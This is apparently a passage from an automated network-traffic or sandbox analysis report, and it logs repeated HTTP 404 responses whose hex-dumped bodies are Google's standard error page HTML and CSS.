70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 